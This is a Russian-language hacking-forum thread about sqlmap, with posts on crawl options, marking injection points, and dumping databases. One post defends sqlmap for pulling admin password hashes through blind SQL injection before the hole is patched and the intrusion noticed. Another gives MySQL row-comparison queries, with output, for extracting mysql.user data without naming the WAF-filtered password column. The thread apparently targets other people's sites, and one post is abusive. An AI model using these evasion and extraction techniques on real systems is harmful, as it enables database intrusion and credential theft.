ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.12.2018, 20:33
|
|
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме:
35643
Репутация:
3
|
|
artkar. Ты...эт пиздец...
Sqlmap просто необходим, а не ненужен. Если у тебя time - based or boolean based иньекция blind, тебе надо вытянуть скажем хэши админов, в хэше 32 символа, на поиск одного верного символа уходит допустим 3-5 запросов к бд. Неверные символы возвращают ответ через 1 секунду, верный через 2. В базе скажем 5 хэшей. У тебя руками неделя уйдет, еще и сидеть с секундомером в руках. А если хэшей 50, 500, 5 000, 50 000 ~ ? Скажешь, напишешь скрипт? Пиши еще неделю, замусори логи тестами скрипта, пока уязвимость не закроют и не спалят. А тут есть готовый инструмент, это sqlmap. Человеку это физически невозможно сделать руками. Это один из возможных примеров, из сотен возможных.
https://www.owasp.org/index.php/Cate...Scanning_Tools вот тебе список всех актуальных и не очень Web Application Security Scanner's , раз ума не хватает загуглить. Что это и для чего, разбирайся сам. Заметь, среди них нет sqlmap'a. Потому что, бык ты, это не сканер уязвимостей. По ссылке https://vulners.com/search?query=sql...n last 10 days я указал тебе последние найденные уязвимости в "современных" сервисах (проверенных продвинутыми пентестами еще до релиза продукта), которые взламываются с помощью sqlmap. Эксплуатируются им, дебил. А netsparker это адвизор баги блядь, именно в этом случае. Нашли они ее, а эксплуатирует ее sqlmap.
И да, иди на***. Тупой еще и спорить пытается, в чем не соображает нихера. На этом разговор с тобой окончен. |
|
|
25.12.2018, 08:19
|
|
Познающий
Регистрация: 19.07.2011
Сообщений: 94
Провел на форуме:
25673
Репутация:
3
|
|
Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
|
|
|
|
25.12.2018, 11:53
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Lazy
↑
Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
|
|
|
|
25.12.2018, 18:39
|
|
Новичок
Регистрация: 10.06.2017
Сообщений: 19
Провел на форуме:
4687
Репутация:
0
|
|
Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( / xxxxx.com/scart/ )? |
|
|
|
25.12.2018, 18:46
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от aZohan
↑
Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( /
xxxxx.com/scart/
)?
--url "link.com/search/*" --dbs
|
|
|
|
25.12.2018, 18:48
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
Провел на форуме:
70303
Репутация:
145
|
|
|
|
|
|
25.12.2018, 19:07
|
|
Познающий
Регистрация: 12.07.2015
Сообщений: 39
Провел на форуме:
13708
Репутация:
0
|
|
ребят подскажите плз почему я в openfire не могу создать компонент или имя домена с символом _
servercomponent проходит а server_component нет
|
|
|
|
25.12.2018, 20:28
|
|
Новичок
Регистрация: 14.12.2018
Сообщений: 12
Провел на форуме:
4317
Репутация:
4
|
|
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x70617373776F7264 FROM a.user
|
|
|
|
25.12.2018, 21:07
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от xmp
↑
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x66 FROM a.user
"SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку
смотря что за запрос, но это в любом случае отдельный скрипт писать придется
если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать
Код:
mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost';
Empty set (0.00 sec)
mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost';
+------+
| true |
+------+
| true |
+------+
1 row in set (0.00 sec)
на примере mysql.user, первая колонка в этой таблице "Host"
Код:
mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
Empty set (0.01 sec)
mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
+------+
| true |
+------+
| true |
+------+
1 row in set (0.01 sec)
|
|
|
|
30.12.2018, 22:05
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Как сливать базу с конца ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
